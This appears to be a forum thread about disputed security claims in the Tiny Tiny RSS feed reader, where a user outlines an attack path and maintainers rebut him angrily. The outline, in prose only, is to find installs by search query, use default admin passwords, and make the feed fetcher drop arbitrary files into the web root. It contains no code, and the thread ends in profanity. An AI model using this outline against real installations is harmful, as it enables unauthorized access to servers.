i think we would be better off letting this drop. the “security issues” were literal FUD, the guy is not going to come back, in general it seems that nobody cares, so there’s nothing left to discuss.
Regarding hypocrisy, the code is bad. That’s not insulting or attacking a person, that’s attacking bad code. However, rather than engage this weird little echo chamber, I’ve started on a complete overhaul using a fork. Again, not sure if this is clear or not: Don’t attack the person, attack the product.
As for the security issues, while reading through the code I’ve only found one glaring issue (so far) in the code and another in the implementation. In the code, the pull on a feed will parse and blindly accept and src attribute of an image element and download the contents into the local filesystem. While that normally wouldn’t be a problem, it’s within the document root path and it’s no being blocked explicitly by a mod_rewrite rule or a directory block from htaccess. The filenames aren’t even randomized, it’s a plain SHA1 if I remember correctly.
In the implementation, the default robots.txt rules allow for the servers to be indexed and about 20% of users are using the default admin password. This shouldn’t have been possible in the first place, but what is done is done.
Those two combined add a big vector for attack. You can do a quick search on Google for the content of a login page to find installations in the wild, about 20% of those you can use the default admin login, and from there set it to a feed of your own creation and have the thing go wild downloading any file in a src attribute onto their server, regardless of content.
Regarding the Christmas card, good find! It’s been about 5 years and I still think it’s hilarious. 
The fact that you think I’m a hipster makes it all the better (satire done well makes people “eat the onion”). In reality, I’m a right-leaning libertarian father of two who commutes in a crossover… And I live in south Brooklyn, least hip place in NYC right after the whole of Staten Island (which, for the record, shouldn’t even be a borough).
welcome back!
are we going to see the exploit poc or
The robots file is not included with TT-RSS because it’s not a part of the application. That is upon the person managing the server.
Of TT-RSS users or every user everywhere? Please clarify. If this is 20% of TT-RSS users please provide a source. Also, again, this is not within the scope of TT-RSS because the end user should be responsible and change their password. TT-RSS has no control over whether users set easy to guess passwords.
Further to this, TT-RSS provides authentication by password (internal or external) and/or certificates, two-factor authentication, and application-specific passwords. All of these are modern security measures that are well-regarded in the industry. We can see larger corporations (e.g. Apple, Microsoft, GitHub, Google, Amazon, etc.) that need to have strong user authentication all have the same practices. This is an accepted implementation for securing accounts.
Your comment here is not entirely clear, but I guess you’re saying that because TT-RSS stores a file on the file system there’s a problem? The software has to save information to work. If you’re talking about allowing access to the file(s) directly through an HTTP request because it’s stored within the path that is allowed to be served by the HTTP server, again, that is upon the person managing the server. TT-RSS used to include .htaccess files but they were removed specifically because not everyone uses Apache and the onus is really on the person managing the server to harden their server.
It really sounds like your issue is more with Apache. 
Do you have a real proof-of-concept to show us? What you’ve described above would basically do nothing with most default installations.
Who’s the eggbot think he is?
It appears to be fine to insult people if it masquerading as sarcasm? Please…
But let’s engage with the code. Others have asked for POC of attacks, so I won’t. How would you make the code better? What specific problem are there in the code that requires a re-write? Why would supporting more databases be beneficial? Are there better ways to do things in PHP than would make Fox’s life easier?
Constructive criticism and humility will get you much respect here…
we even have a wiki page on securing cache directories and it should be linked in the installation guide.
as for default username and password, installer could certainly generate a random password for admin user but this is trying to combat user stupidity with technical means which is a battle that’s impossible to win.
also, tt-rss was never designed as a tool for people which are technically inept on such level they don’t change default admin password (after tt-rss nags them about it on login).
there’s some technical competence implied if you’re installing and using this tool, otherwise you’d be getting your news on facebook anyway.
you now knowing about either of those things (wiki and popup nag) and willfully conflating apache-specific issues with tt-rss tells me everything you need to know about your approach to discussion, as if this wasn’t evident enough from your previous posts.
i’m sure there are better places to spread your vague FUD than this forum, you’ve already had great results on reddit with incompetent people buying and repeating your security meme bullshit wholesale. maybe you should go back to posting there.
if you manage to demonstrate a POC exploit, i’m going to unban you. until then, stop wasting our collective time and fuck off.